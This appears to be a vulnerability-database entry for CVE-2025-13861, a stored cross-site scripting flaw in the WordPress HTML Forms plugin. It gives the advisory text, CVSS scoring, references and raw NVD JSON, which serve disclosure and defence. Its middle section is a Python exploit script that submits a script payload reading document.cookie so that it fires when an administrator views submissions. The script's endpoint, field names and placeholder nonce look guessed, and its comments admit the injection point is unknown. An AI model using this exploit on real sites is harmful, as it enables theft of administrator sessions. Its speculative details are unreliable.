Security Vulnerability Report
CVE-2025-13861 CVSS 6.1 MEDIUM

CVE-2025-13861

Published: 2025-12-17 05:16:11
Last Modified: 2026-04-15 00:35:42

Description

The HTML Forms – Simple WordPress Forms Plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in all versions up to and including 1.6.0 due to insufficient sanitization of fabricated file upload field metadata before displaying it in the WordPress admin dashboard. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever an administrator accesses the form submissions page.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HTML Forms plugin <= 1.6.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13861 PoC - WordPress HTML Forms Plugin Stored XSS
# Target: WordPress site with HTML Forms plugin <= 1.6.0

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"

# Malicious payload for file upload field metadata
# This payload exploits the lack of sanitization in file field metadata handling
xss_payload = '<script>alert(document.cookie)</script>'

# The plugin stores file metadata without proper sanitization
# Payload can be injected through crafted form submission
form_data = {
    'html-form-id': '1',
    'field-name': 'file_upload',
    'field-value': xss_payload,
    '_wpnonce': 'attacker_need_to_obtain'  # WordPress nonce may be bypassed in some configs
}

# Step 1: Submit form with malicious file metadata
submit_url = f"{target_url}/wp-json/html-forms/v1/submissions"
response = requests.post(submit_url, data=form_data)
print(f"[+] Form submission sent: {response.status_code}")

# Step 2: When admin views submissions, XSS will execute
admin_view_url = f"{target_url}/wp-admin/admin.php?page=html-forms&view=submissions&form_id=1"
print(f"[+] Malicious payload stored. Admin must visit: {admin_view_url}")
print(f"[+] XSS payload: {xss_payload}")

# Note: Actual exploitation may require:
# 1. Bypassing WordPress nonce protection in certain configurations
# 2. Finding valid form ID
# 3. Understanding the specific injection point in file metadata

print("\n[!] This PoC is for educational purposes only.")
```

References

https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L321
https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L357
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3419926%40html-forms%2Ftrunk&old=3407043%40html-forms%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/52e2f1b9-d240-4813-9124-51bd6b047553?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13861",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T05:16:10.977",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The HTML Forms – Simple WordPress Forms Plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in all versions up to and including 1.6.0 due to insufficient sanitization of fabricated file upload field metadata before displaying it in the WordPress admin dashboard. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever an administrator accesses the form submissions page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L321",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L357",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3419926%40html-forms%2Ftrunk&old=3407043%40html-forms%2Ftrunk&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/52e2f1b9-d240-4813-9124-51bd6b047553?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```